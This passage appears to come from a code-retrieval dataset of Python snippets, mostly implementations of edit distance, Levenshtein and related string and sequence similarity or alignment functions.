len(seq2):\n seq1,seq2 = seq2,seq1\n distances = range(len(seq1) + 1)\n for index2,char2 in enumerate(seq2):\n newDistances = [index2+1]\n for index1,char1 in enumerate(seq1):\n if char1 == char2:\n newDistances.append(distances[index1])\n else:\n newDistances.append(1 + min((distances[index1],\n distances[index1+1],\n newDistances[-1])))\n distances = 
newDistances\n return distances[-1]", "def edit_distance(left, right):\n similarities = np.zeros((len(left) + 1, len(right) + 1), dtype=np.int32)\n similarities[:, 0] = range(len(left) + 1)\n similarities[0, :] = range(len(right) + 1)\n\n for l in range(1, len(left) + 1):\n for r in range(1, len(right) + 1):\n sub_cost = 0 if left[l - 1] == right[r - 1] else 1\n similarities[l][r] = min(similarities[l - 1][r] + 1,\n similarities[l][r - 1] + 1,\n similarities[l - 1][r - 1] + sub_cost)\n return similarities[len(left), len(right)]", "def min_edit_distance(x: str, y: str, return_matrix: bool = False) -> object:\n m = _get_edit_distance_matrix(x, y)\n\n for i in range(1, len(x) + 1):\n\n for j in range(1, len(y) + 1):\n # How do we obtain the m[i][j] value?\n # We need to look at three positions while iterating:\n # 1. m[i - 1][j -1]\n # 2. m[i][j - 1]\n # 3. m[i - 1][j]\n\n # x[i - 1] and y[j - 1] are the characters.\n\n # Note: i and j start from 1.\n\n # If the characters are equal, we don't need to perform any of the\n # operations: insertion, deletion or substitution, and the minimum\n # edit distance to convert x[i - 1] to y[j - 1] is the same as the\n # one to convert x[i] to s[j], because, as stated above, x[i - 1]\n # and y[j - 1] are equal, so we don't have to perform any other\n # operation.\n if x[i - 1] == y[j - 1]:\n m[i][j] = m[i - 1][j - 1]\n else:\n m[i][j] = min(m[i - 1][j - 1] + 1, m[i - 1]\n [j] + 1, m[i][j - 1] + 1)\n\n return m[len(x)][len(y)] if not return_matrix else m", "def leveinshtein_distance(source,target):\r\n\t#Step 1\r\n\ts_len=len(source)\r\n\tt_len=len(target)\r\n\tcost=0\r\n\tif(s_len==0):\r\n\t\treturn t_len\r\n\tif(t_len==0):\r\n\t\treturn s_len\r\n\tprint(\"Dimensions:\\n\\tN:%d\\n\\tM:%d\"%(s_len,t_len))\r\n\t#Step 2\r\n\tmatrix=[[0 for _ in range(0,t_len+1)] for _ in range(0, s_len+1)]\r\n\t#Initialize the first column 0..s_len\r\n\tfor idx in range(0,s_len+1):\r\n\t\tmatrix[idx][0]=idx\r\n\t#Initialize the first row 0..t_len\r\n\tfor idx in range(0, t_len+1):\r\n\t\tmatrix[0][idx]=idx\r\n\tprint(\"===Original===\")\r\n\tprint_matrix(matrix,source,target)\r\n\t#Step 3\r\n\tfor i in range(1,s_len+1):\r\n\t\tch=source[i-1]\r\n\t\t#print(ch)\r\n\t\t#Step 4\r\n\t\tfor j in range(1,t_len+1):\r\n\t\t\t#print(\">%s\"%target[j-1])\r\n\t\t\t#Step 5\r\n\t\t\tif ch==target[j-1]:\r\n\t\t\t\tcost=0\r\n\t\t\telse:\r\n\t\t\t\tcost=1\r\n\t\t\t#Step 6\r\n\t\t\t\r\n\t\t\t#print(\"(i,j)=>(%d,%d)\"%(i,j))\r\n\t\t\t#print(matrix[i][j])\r\n\t\t\tmatrix[i][j]=minimum(\r\n\t\t\t\tmatrix[i-1][j]+1,\r\n\t\t\t\tmatrix[i][j-1]+1,\r\n\t\t\t\tmatrix[i-1][j-1]+cost\r\n\t\t\t)\r\n\tprint(\"===Final Matrix===\")\r\n\tprint_matrix(matrix,source,target)\r\n\treturn matrix[s_len][t_len]", "def minDistance(self, word1: str, word2: str) -> int: \n len_one = len(word1)\n len_two = len(word2)\n\n # Create matrix which will keep a running count of the minimum number\n # of edits needed \n dp = [[0 for c in range(len_one + 1)] for r in range(len_two + 1)]\n\n # In this case, the rows correspond to the letters of word2\n # while the columns correspond to the letters of word1\n for i in range(0, len_two + 1):\n for j in range(0, len_one + 1):\n # The first row/column should just be a linear increasing\n # function of j. It is the equivalent of saying starting \n # from nothing, how many edits must be made to have a string\n # of length j\n if j == 0:\n dp[i][j] = i\n # Same for i. 
See the example matrix.\n elif i == 0:\n dp[i][j] = j\n else:\n # need i - 1 and j - 1, otherwise an index error will occur.\n # Remember that our matrix is of size (len_two + 1) x (len_one + 1)\n if word2[i - 1] == word1[j - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n else:\n dp[i][j] = 1 + min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1])\n\n return dp[-1][-1]", "def iterated_lev_dist(a, b, tolerance=5):\n lenA, lenB = _len(a), _len(b)\n\n # Optimize away edge cases...\n if a == b:\n return 0\n\n # Lower bound is length diff, quit if length difference is too big\n if _abs(lenA - lenB) > tolerance:\n return -1\n\n # Quit early if we know the minimum number of substitutions to make will\n # already be too big\n min_substitutions = _len(_symdif({*a}, {*b})) / 2\n if min_substitutions > tolerance:\n return -1\n\n # We need 2 arrays, 1 larger than the compared\n slots = _len(b) + 1\n v0 = list(range(slots))\n v1 = [0] * slots\n\n # print(' ', ' '.join(t))\n # Walking over rows. Each row represents one step along the source string.\n # Last cell of last row gives us the edit distance.\n for i, A in enumerate(a):\n # First cell of each row is for comparison against empty string\n # the cost is always equal to length of source string walked so far\n v1[0] = i + 1\n\n for j, B in enumerate(b):\n delCost = v0[j + 1] + 1 # j+1 since the first value in the row\n # is distance from an empty str\n subCost = v0[j] + (A != B) # substitution\n insCost = v1[j] + 1 # the insert cost is always at least 1\n v1[j + 1] = _min(delCost, insCost, subCost)\n\n # When moving to next row, current row\n v0 = _lcopy(v1)\n # print(A, v0)\n return v0[-1]", "def edit_distance(str1, str2):\n\n if not str1:\n return len(str2)\n if not str2:\n return len(str1)\n\n DP = [[-1 for __ in str2] for ___ in str1]\n DP[0][0] = 0 if str1[0] == str2[0] else 1\n\n\n for x, let1 in enumerate(str1):\n startat = 0\n if x == 0:\n startat = 1\n for y, let2 in enumerate(str2[startat:], startat):\n minimum = float('inf')\n if x != 0:\n minimum = min(DP[x-1][y] + 1, minimum)\n if y != 0:\n minimum = min(DP[x-1][y-1] + (0 if let1 == let2 else 1), minimum)\n if y != 0:\n minimum = min(DP[x][y-1] + 1, minimum)\n\n DP[x][y] = minimum\n\n return DP[len(str1) - 1][len(str2) - 1]", "def line_edits(s1, s2):\n l1 = s1.splitlines()\n l2 = s2.splitlines()\n \n result = editDistance(l1, l2)\n \n result = result[::-1]\n \n return result", "def levenshtein_normalised(str1, str2):\n\treturn levenshtein(str1, str2, normalise=True)", "def distance(str1, str2):\n return levenshtein.normalized_distance(str1, str2)", "def levenshtein(source, target):\n if len(source) < len(target):\n return levenshtein(target, source)\n\n # So now we have len(source) >= len(target).\n if len(target) == 0:\n return len(source)\n\n # We call tuple() to force strings to be used as sequences\n # ('c', 'a', 't', 's') - numpy uses them as values by default.\n source = np.array(tuple(source))\n target = np.array(tuple(target))\n\n # We use a dynamic programming algorithm, but with the\n # added optimization that we only need the last two rows\n # of the matrix.\n previous_row = np.arange(target.size + 1)\n for s in source:\n # Insertion (target grows longer than source):\n current_row = previous_row + 1\n\n # Substitution or matching:\n # Target and source items are aligned, and either\n # are different (cost of 1), or are the same (cost of 0).\n current_row[1:] = np.minimum(\n current_row[1:],\n np.add(previous_row[:-1], target != s))\n\n # Deletion (target grows shorter than 
source):\n current_row[1:] = np.minimum(\n current_row[1:],\n current_row[0:-1] + 1)\n\n previous_row = current_row\n\n return previous_row[-1]", "def lemmas_similarity(s1, s2, filter_stop_words=True):\n # Tokenize by sentences into words in lower case \n tokenized_sentence_1 = nltk.word_tokenize(s1.lower())\n tokenized_sentence_2 = nltk.word_tokenize(s2.lower())\n \n if filter_stop_words:\n tokenized_sentence_1 = [token for token in tokenized_sentence_1 if token not in stop_words]\n tokenized_sentence_2 = [token for token in tokenized_sentence_2 if token not in stop_words]\n \n tagged_sentence_1 = pos_tag(tokenized_sentence_1) # [ (word, POS_TAG), ...]\n tagged_sentence_2 = pos_tag(tokenized_sentence_2) # [ (word, POS_TAG), ...]\n \n lemmas_sentence_1 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_1] \n lemmas_sentence_2 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_2] # [LEMMA_1, ...]\n \n # Compute similarity\n if len(lemmas_sentence_1) > 0 and len(lemmas_sentence_2) > 0:\n similarity = 1 - jaccard_distance(set(lemmas_sentence_1), set(lemmas_sentence_2))\n # Compute label of similarity \n return similarity\n else:\n return 0", "def matrix_score(sequence1: str, sequence2: str, matrix_str: str = BLOSUM62) -> int:\r\n score_matrix = _load_matrix(matrix_str)\r\n score = 0\r\n for amino1, amino2 in zip(sequence1, sequence2):\r\n try:\r\n current_score = score_matrix[amino1.upper()][amino2.upper()]\r\n score += current_score\r\n print(f'{amino1} <-> {amino2}: {current_score}')\r\n except KeyError:\r\n raise AminoAcidNotFoundError(f'Scoring matrix does not support scoring for: (\\'{amino1}\\', \\'{amino2}\\')')\r\n return score", "def pos_match(self, a, b, threshold=0.5):\r\n # pos_a = map(self.get_wordnet_pos, nltk.pos_tag(word_tokenize(a)))\r\n # pos_b = map(self.get_wordnet_pos, nltk.pos_tag(word_tokenize(b)))\r\n pos_a = [self.get_wordnet_pos(token) for token in nltk.pos_tag(word_tokenize(a))]\r\n pos_b = [self.get_wordnet_pos(token) for token in nltk.pos_tag(word_tokenize(b))]\r\n lemmae_a = [self.lemmatizer.lemmatize(token.lower().strip(string.punctuation), pos) for token, pos in pos_a \\\r\n if pos == wordnet.NOUN and token.lower().strip(string.punctuation) not in self.stopwords]\r\n lemmae_b = [self.lemmatizer.lemmatize(token.lower().strip(string.punctuation), pos) for token, pos in pos_b \\\r\n if pos == wordnet.NOUN and token.lower().strip(string.punctuation) not in self.stopwords]\r\n\r\n # Calculate Jaccard similarity\r\n ratio = len(set(lemmae_a).intersection(lemmae_b)) / float(len(set(lemmae_a).union(lemmae_b)))\r\n return ratio\r\n # if ratio >= threshold: return ratio\r\n # return (ratio >= threshold)\r", "def edit_distance(str_1, str_2):\n return edit_distance_dp(str_1, len(str_1), str_2, len(str_2))", "def damerau_levenshtein_distance(comp_sec):\n s1 = comp_sec['log_trace']\n s2 = comp_sec['sim_trace']\n p1 = comp_sec['proc_log_trace']\n p2 = comp_sec['proc_sim_trace']\n w1 = comp_sec['wait_log_trace']\n w2 = comp_sec['wait_sim_trace']\n d = {}\n lenstr1 = len(s1)\n lenstr2 = len(s2)\n for i in range(-1,lenstr1+1):\n d[(i,-1)] = i+1\n for j in range(-1,lenstr2+1):\n d[(-1,j)] = j+1\n for i in range(0, lenstr1):\n for j in range(0, lenstr2):\n if s1[i] == s2[j]:\n t1 = p1[i] + w1[i]\n if t1 > 0:\n b1 = (p1[i]/t1)\n b2 = (w1[i]/t1)\n cost = (b1*abs(p2[j]-p1[i])) + (b2*abs(w2[j]-w1[i]))\n else:\n cost = 0\n else:\n cost = 1\n d[(i,j)] = min(\n d[(i-1,j)] + 1, # deletion\n d[(i,j-1)] + 1, # insertion\n d[(i-1,j-1)] + cost, # 
substitution\n )\n if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:\n d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition\n return d[lenstr1-1,lenstr2-1]", "def pairwiseScore(seq1, seq2, matrix):\n \n gap = -4.0\n incr_top = 0\n incr_bottom = 0\n pairwise_score = 0\n for i,j in zip(range(len(seq1)), range(len(seq2))):\n aa1 = seq1[i]\n aa2 = seq2[j] \n if aa1==\"-\" and aa2 ==\"-\" :\n pairwise_score += 0\n elif aa1!=\"-\" and aa2!=\"-\":\n pairwise_score += float(matchScore(aa1, aa2, matrix))\n elif aa1==\"-\" and aa2!=\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11==\"-\" and aa22!=\"-\":\n incr_top += 1\n else: \n pairwise_score += gap + incr_top * incr_top\n incr_top = 0\n except: \n pairwise_score += gap\n pass\n elif aa1!=\"-\" and aa2==\"-\":\n try:\n aa11 = seq1[i+1]\n aa22 = seq2[j+1]\n if aa11!=\"-\" and aa22==\"-\":\n incr_bottom += 1\n else: \n pairwise_score += gap + incr_bottom * incr_bottom\n incr_bottom = 0\n except: \n pairwise_score += gap\n pass\n else: pass\n \n return pairwise_score", "def levenshtein_similarity(self, top, rows):\n if len(rows) > 1:\n return (\n [(1 - editdistance.eval(top, rows[i]) / max(len(top), len(rows[i]))) for i in\n range(0, len(rows))])\n else:\n return 1", "def editing_distance(str1: str, str2: str) -> int:\r\n if not str1 and not str2:\r\n return 0\r\n if not str1:\r\n return len(str2)\r\n if not str2:\r\n return len(str1)\r\n if str1[0] == str2[0]:\r\n return min(editing_distance(str1[1::], str2[1::]), 1 + editing_distance(str1, str2[1::]),\r\n 1 + editing_distance(str1[1::], str2))", "def matcher(features1, features2):\n #TODO: write a matching function\n #Performing the L2-Norm\n new_features1=[]\n new_features2=[]\n for itr in range(5):\n [rootOfSquare1,rootOfSquare2] = sumOfSquares(features1[itr],features2[itr])\n new_features1.append(np.array(features1[itr])/rootOfSquare1)\n new_features2.append(np.array(features2[itr])/rootOfSquare2)\n indices = []\n for itr in range(len(new_features1)):\n findMinDist=[]\n #findMaxCosineVal=[]\n for itr2 in range(len(new_features2)):\n f1 = new_features1[itr]\n f2 = new_features2[itr2]\n\n #For evaluating the cosine similarity\n # [rootOfSquare1,rootOfSquare2] = sumOfSquares(f1,f2)\n # numerator = np.array(f1)*np.array(f2)\n # numeratorSum = sum(numerator)\n # denominator = rootOfSquare1*rootOfSquare2\n # cosine = np.divide(numeratorSum,denominator)\n # findMaxCosineVal.append(cosine)\n\n #For evaluating the similarity based on euclidean distance\n Dist = np.array(f1) - np.array(f2)\n sum=0\n for i in Dist:\n sum=sum+math.pow(i,2)\n rootOfSum = math.sqrt(sum)\n findMinDist.append(rootOfSum)\n # print \"itr: \", itr, \" Matching scores: \", findMaxCosineVal\n # bestMatch = findMaxCosineVal.index(max(findMaxCosineVal))\n bestMatch = findMinDist.index(min(findMinDist))\n indices.append([itr,bestMatch])\n return indices", "def optimal_string_alignment_similarity(s1, s2):\n max_cost = max(len(s1), len(s2))\n\n if max_cost == 0:\n return 1.0\n\n return 1.0 - float(optimal_string_alignment_distance(s1, s2)) / max_cost", "def levenshtein_distance(s1, s2, insert=None, delete=None, substitute=None,\n insert_default=1, delete_default=1, substitute_default=1):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n insert = insert if isinstance(insert, dict) else {}\n delete = delete if isinstance(delete, dict) else {}\n substitute = substitute if isinstance(substitute, dict) else {}\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = 
len(s1), len(s2)\n if n1 == 0 and n2 == 0:\n return 0\n\n # if n1 == 0 or n2 == 0:\n # return max(n1, n2)\n\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n for i in range(n1 + 1):\n for j in range(n2 + 1):\n if i == 0 and j == 0: # [0,0]\n continue\n elif i == 0: # most top row\n c = s2[j - 1]\n dp[i][j] = insert[c] if c in insert else insert_default\n dp[i][j] += dp[i][j - 1]\n elif j == 0: # most left column\n c = s1[i - 1]\n dp[i][j] = delete[c] if c in delete else delete_default\n dp[i][j] += dp[i - 1][j]\n else:\n c1, c2 = s1[i - 1], s2[j - 1]\n insert_cost = insert[c2] if c2 in insert else insert_default\n delete_cost = delete[c1] if c1 in delete else delete_default\n substitute_cost = substitute[c1][c2] \\\n if c1 in substitute and c2 in substitute[c1] else substitute_default\n\n if c1 == c2:\n dp[i][j] = dp[i - 1][j - 1]\n else:\n dp[i][j] = min(dp[i][j - 1] + insert_cost,\n dp[i - 1][j] + delete_cost,\n dp[i - 1][j - 1] + substitute_cost)\n return dp[n1][n2]", "def calculate_score(s1, s2, l1, l2, startpoint):\n\n matched = \"\" # to hold string displaying alignments\n score = 0\n for i in range(l2):\n if (i + startpoint) < l1:\n if s1[i + startpoint] == s2[i]: # if the bases match\n matched = matched + \"*\" # * indicates a match\n score = score + 1\n else:\n matched = matched + \"-\" # - indicates no match\n\n return score", "def Levenshtein(a, b):\n v0 = list(range(len(b)+1))\n v1 = list(range(len(b)+1)) # Or whatever.\n\n for i in range(len(a)):\n v1[0] = i + 1\n\n for j in range(len(b)):\n deletionCost = v0[j + 1] + 1\n insertionCost = v1[j] + 1\n substitutionCost = v0[j] if a[i] == b[j] else v0[j]+1\n v1[j + 1] = min(deletionCost, insertionCost, substitutionCost)\n\n v1, v0 = v0, v1\n return v0[len(b)]", "def similarity(a, b):\n distance = Levenshtein.distance(a, b)\n return 1 - (distance / max((len(a), len(b))))", "def compare_stability_matrices(ism1, ism2): \n \n import scipy as sp\n import sklearn as sk\n\n ism1=sk.preprocessing.normalize(ism1,norm='l2')\n ism2=sk.preprocessing.normalize(ism2,norm='l2')\n distance=sp.spatial.distance.correlation(ism1.ravel(), ism2.ravel())\n similarity= 1-distance\n return similarity", "def levenshtein_similarity(s1, s2, insert=None, delete=None, substitute=None,\n insert_default=1, delete_default=1, substitute_default=1,\n lower_bound=None):\n insert = insert if isinstance(insert, dict) else {}\n delete = delete if isinstance(delete, dict) else {}\n substitute = substitute if isinstance(substitute, dict) else {}\n\n def compute_max_cost(s):\n return sum([\n max(\n insert[c] if c in insert else insert_default,\n delete[c] if c in delete else delete_default,\n substitute[c] if c in substitute else substitute_default\n ) for c in s\n ])\n\n def estimate_min_char_cost(s):\n return min([min(\n insert[c] if c in insert else insert_default,\n delete[c] if c in delete else delete_default,\n substitute[c] if c in substitute else substitute_default\n ) for c in s])\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n max_cost = max(compute_max_cost(s1), compute_max_cost(s2))\n\n if lower_bound:\n diff = abs(len(s1) - len(s2))\n if len(s1) == 0 and len(s2) == 0:\n return 1.0\n elif len(s1) == 0:\n min_lev = float(diff * estimate_min_char_cost(s2))\n elif len(s2) == 0:\n min_lev = float(diff * estimate_min_char_cost(s1))\n else:\n min_lev = float(diff * min(estimate_min_char_cost(s1), estimate_min_char_cost(s2)))\n est_sim = 1.0 - min_lev / max_cost\n if est_sim < lower_bound:\n return 0.0\n\n lev = levenshtein_distance(s1, s2, 
insert, delete, substitute,\n insert_default, delete_default, substitute_default)\n\n if max_cost < lev:\n raise ValueError('Illegal value of operation cost')\n\n if max_cost == 0:\n return 1.0\n\n lev_sim = 1.0 - float(lev) / max_cost\n if lower_bound and lev_sim < lower_bound:\n return 0.0\n return lev_sim", "def edit_distance(self):\n\n edit_dist = 0\n misaligned = False\n\n try:\n with open(self.output_file, 'r') as output_file, open(self.gt_file, 'r') as gt_file:\n\n out_lines = output_file.readlines()\n gt_lines = [g.strip() for g in gt_file.readlines()]\n\n num_symbols = 0\n bd = 0\n # Go through all lines (for polyphony)\n for i in range(len(out_lines)):\n # Skip comparing sequence staff line\n if 'Sequence staff' in gt_lines[i]:\n continue\n\n out_split = out_lines[i].split()\n gt_split = gt_lines[i].split()\n\n #print('Out:',out_split)\n #print('Gt:',gt_split)\n\n num_symbols += len(gt_split) # for calculating symbol error rate\n misaligned = 'misaligned' in out_lines[i] # for ensembling\n\n _a = [symbol for symbol in out_split if symbol != '\\n' and symbol != -1]\n _b = [symbol for symbol in gt_split if symbol != '\\n' and symbol != -1]\n\n ed = self.levenshtein(_a,_b)\n \n # Account for barline at end (don't use when checking CRNN output)\n #if ed == 1 and out_split[-1] == 'barline' and gt_split[-1] != 'barline':\n # ed = 0\n \n edit_dist += ed\n \n staff_num = (i + 1) // 2\n \n if ed == 1:\n pass\n #print(self.output_file)\n #print('Edit dist (staff #%d): %d' % (staff_num, ed))\n \n if _a[-1] == 'barline' and _b[-1] != 'barline' or \\\n _a[-1] != 'barline' and _b[-1] == 'barline':\n #print('Barline diff') \n # print(self.output_file)\n bd = 1\n #print(_a)\n #print(_b)\n \n\n '''\n if len(out_split) != len(gt_split):\n return 0\n\n for j in range(len(out_split)):\n # Treat slur and tie as equivalent\n if out_split[j] != gt_split[j] and\\\n ('slur' not in out_split[j] and 'tie' not in out_split[j]) and\\\n ('slur' not in gt_split[j] and 'tie' not in gt_split[j]):\n return 0\n '''\n except FileNotFoundError:\n print('Missing:',self.output_file, self.gt_file)\n return -1, 1, 0, False\n #print('Found:',self.output_file, self.gt_file)\n return edit_dist, num_symbols, bd, misaligned", "def simple_baseline_similarity(s1, s2):\n # Tokenize by sentences into words in lower case \n tokenized_sentence_1 = nltk.word_tokenize(s1.lower())\n tokenized_sentence_2 = nltk.word_tokenize(s2.lower())\n\n tagged_sentence_1 = pos_tag(tokenized_sentence_1) # [ (word, POS_TAG), ...]\n tagged_sentence_2 = pos_tag(tokenized_sentence_2) # [ (word, POS_TAG), ...]\n \n lemmas_sentence_1 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_1 if not tagged_word in stop_words] \n lemmas_sentence_2 = [lemmatize(tagged_word, wnl) for tagged_word in tagged_sentence_2 if not tagged_word in stop_words] # [LEMMA_1, ...]\n \n word_seq_match = difflib.SequenceMatcher(None, tokenized_sentence_1, tokenized_sentence_2)\n word_match = word_seq_match.find_longest_match(0, len(tokenized_sentence_1), 0, len(tokenized_sentence_2))\n\n lemm_seq_match = difflib.SequenceMatcher(None, lemmas_sentence_1, lemmas_sentence_2)\n lemm_match = lemm_seq_match.find_longest_match(0, len(lemmas_sentence_1), 0, len(lemmas_sentence_2))\n\n word_sim = word_match.size/(max(len(tokenized_sentence_1), len(tokenized_sentence_2)) + 0.001)\n lemm_sim = lemm_match.size/(max(len(lemmas_sentence_1), len(lemmas_sentence_2)) + 0.001)\n\n return word_sim, lemm_sim", "def __init__(self,alphabet=\"amino\",dist_function=\"simple\"):\n\n # 
initialize internal variables\n self.alphabet = alphabet\n self.dist_function = dist_function\n\n # decide on the alphabet\n if self.alphabet == \"amino\": \n self._alphabet_string = \"*ABCDEFGHIKLMNPQRSTVWXYZ\"\n else:\n raise ValueError(\"alphabet not recognized.\")\n \n if self.dist_function == \"simple\":\n self._dist_function_internal = 0\n elif self.dist_function == \"dl\":\n self._dist_function_internal = 1\n else:\n err = \"dist_function not recognized. should be 'simple' or 'dl' (Damerau-Levenshtein)\\n\"\n raise ValueError(err)\n \n self.alphabet_size = len(list(self._alphabet_string))\n\n enum_list = zip(self._alphabet_string,range(len(self._alphabet_string)))\n self._alphabet_dict = dict([(a, i) for a, i in enum_list])\n\n tmp_matrix = np.zeros((self.alphabet_size,self.alphabet_size),dtype=int)\n for k1 in self._alphabet_string:\n i = self._alphabet_dict[k1] \n for k2 in self._alphabet_string:\n j = self._alphabet_dict[k2]\n if k1 == k2:\n tmp_matrix[i,j] = 0\n else:\n tmp_matrix[i,j] = 1\n\n self.dist_matrix = tmp_matrix", "def iterative_levenshtein(s, t):\n rows = len(s)+1\n cols = len(t)+1\n dist = [[0 for x in range(cols)] for x in range(rows)]\n # source prefixes can be transformed into empty strings \n # by deletions:\n for i in range(1, rows):\n dist[i][0] = i\n # target prefixes can be created from an empty source string\n # by inserting the characters\n for i in range(1, cols):\n dist[0][i] = i\n \n for col in range(1, cols):\n for row in range(1, rows):\n if s[row-1] == t[col-1]:\n cost = 0\n else:\n cost = 1\n dist[row][col] = min(dist[row-1][col] + 1, # deletion\n dist[row][col-1] + 1, # insertion\n dist[row-1][col-1] + cost) # substitution\n #for r in range(rows):\n #print(dist[r])\n \n \n return dist[row][col]", "def optimal_string_alignment_distance(s1, s2):\n\n utils.check_for_none(s1, s2)\n utils.check_for_type(str, s1, s2)\n\n # s1 = utils.unicode_normalize(s1)\n # s2 = utils.unicode_normalize(s2)\n\n n1, n2 = len(s1), len(s2)\n\n dp = [[0] * (n2 + 1) for _ in range(n1 + 1)]\n\n for i in range(0, n1 + 1):\n dp[i][0] = i\n for j in range(0, n2 + 1):\n dp[0][j] = j\n\n for i in range(1, n1 + 1):\n for j in range(1, n2 + 1):\n cost = 0 if s1[i - 1] == s2[j - 1] else 1\n\n dp[i][j] = min(dp[i][j - 1] + 1,\n dp[i - 1][j] + 1,\n dp[i - 1][j - 1] + cost)\n\n if i > 1 and j > 1 and s1[i - 1] == s2[j - 2] and s1[i - 2] == s2[j - 1]:\n dp[i][j] = min(dp[i][j], dp[i - 2][j - 2] + cost)\n\n return dp[n1][n2]", "def distance(str1, str2):\n m = np.zeros([len(str2)+1, len(str1)+1])\n for x in range(1, len(str2) + 1):\n m[x][0] = m[x-1][0] + 1\n for y in range(1, len(str1) + 1):\n m[0][y] = m[0][y-1] + 1\n for x in range(1, len(str2) + 1):\n for y in range(1, len(str1) + 1):\n if str1[y-1] == str2[x-1]:\n dg = 0\n else:\n dg = 1\n m[x][y] = min(m[x-1][y] + 1, m[x][y-1] + 1, m[x-1][y-1] + dg)\n return int(m[len(str2)][len(str1)])", "def _edit_distance(prediction_tokens: List[str], reference_tokens: List[str]) ->int:\n dp = [([0] * (len(reference_tokens) + 1)) for _ in range(len(prediction_tokens) + 1)]\n for i in range(len(prediction_tokens) + 1):\n dp[i][0] = i\n for j in range(len(reference_tokens) + 1):\n dp[0][j] = j\n for i in range(1, len(prediction_tokens) + 1):\n for j in range(1, len(reference_tokens) + 1):\n if prediction_tokens[i - 1] == reference_tokens[j - 1]:\n dp[i][j] = dp[i - 1][j - 1]\n else:\n dp[i][j] = min(dp[i - 1][j], dp[i][j - 1], dp[i - 1][j - 1]) + 1\n return dp[-1][-1]", "def test_filter_samples_from_distance_matrix(self):\r\n actual = 
filter_samples_from_distance_matrix(\r\n parse_distmat(self.input_dm1),\r\n [\"GHI blah\", \"XYZ\"])\r\n self.assertEqual(actual, expected_dm1a)\r\n actual = filter_samples_from_distance_matrix(\r\n parse_distmat(self.input_dm1),\r\n [\"GHI\", \"DEF\"])\r\n self.assertEqual(actual, expected_dm1b)", "def get_mismatch_matrix(k,m):\n words = get_words(k)\n N = len(words)\n\n mismatch_matrix = np.zeros((N, N))\n for i in range(N):\n for j in range(i, N):\n if Levenshtein.hamming(words[i], words[j]) <= m:\n mismatch_matrix[i,j] = 1/2\n mismatch_matrix[j,i] = 1/2\n\n return mismatch_matrix", "def edit_distance(str1, str2):\n if len(str1) == 0 or len(str2) == 0:\n return max(len(str1), len(str2))\n if str1[-1] == str2[-1]:\n return edit_distance(str1[:-1], str2[:-1])\n insert = edit_distance(str1, str2[:-1])\n delete = edit_distance(str1[:-1], str2)\n replace = edit_distance(str1[:-1], str2[:-1])\n return min(insert, delete, replace) + 1", "def compute_local_alignment(seq_x, seq_y, scoring_matrix, alignment_matrix):\n align_x = \"\"\n align_y = \"\"\n\n len_x = len(seq_x)\n len_y = len(seq_y)\n\n #score = max([alignment_matrix[row][col] for row in range(len_x + 1) for col in range(len_y+1)])\n\n max_score = -1\n max_positions = []\n for row in range(len(seq_x)+1):\n for col in range(len(seq_y)+1):\n if alignment_matrix[row][col] == max_score:\n max_positions.append((row,col))\n if alignment_matrix[row][col] > max_score:\n max_score = alignment_matrix[row][col]\n max_positions = [(row, col)]\n max_row, max_col = random.choice(max_positions)\n\n #print max_score, max_row, max_col\n\n len_x = max_row\n len_y = max_col\n\n while alignment_matrix[len_x][len_y] > 0:\n #print len_x, len_y\n if alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y - 1] + scoring_matrix[seq_x[len_x-1]][seq_y[len_y-1]]:\n align_x = seq_x[len_x-1] + align_x\n align_y = seq_y[len_y-1] + align_y\n len_x -= 1\n len_y -= 1\n elif alignment_matrix[len_x][len_y] == alignment_matrix[len_x -1][len_y] + scoring_matrix[seq_x[len_x-1]][\"-\"]:\n align_x = seq_x[len_x-1] + align_x\n align_y = \"-\" + align_y\n len_x -= 1\n else:\n align_x = \"-\" + align_x\n align_y = seq_y[len_y-1] + align_y\n len_y -= 1\n\n #while len_x > 0:\n # align_x = seq_x[len_x-1] + align_x\n # align_y = \"-\" + align_y\n # len_x -= 1\n\n #while len_y > 0:\n # align_x = \"-\" + align_x\n # align_y = seq_y[len_y-1] + align_y\n # len_y -= 1\n\n return (max_score, align_x, align_y)", "def average_distance(l1, l2, distance_function=None):\n\n if not distance_function:\n distance_function = levenshtein_ratio\n counter = 0.0\n numerator = 0.0\n \n #compute array of values\n# if not l1 or not l2:\n# return 1.0\n #make l1 the shortest\n l1, l2 = len(l1)<len(l2) and (l1, l2) or (l2, l1)\n \n #compute the distances\n distances = []\n for s1 in l1:\n distances += [(distance_function(s1, s2), s1, s2) for s2 in l2]\n# ls.sort(reverse=True)\n# distances.append((ls, s1))\n distances.sort(reverse=True)\n #compute maxima for each column and each row\n done = set()\n for d, s1, s2 in distances:\n if s1 not in done and s2 not in done:\n done.add(s1)\n done.add(s2) \n counter += d\n numerator += 1\n #if there is a difference in length, we penalize for each item \n difference = len(l2) - len(l1)\n counter += .8 * difference\n numerator += difference\n if numerator == 0:\n return 1.0\n return counter/numerator", "def edit_distance_dp(str_1, m, str_2, n):\n # table for storing sub-problems\n sub = [[0 for i in range(n + 1)] for j in range(m + 1)] # padded for empty 
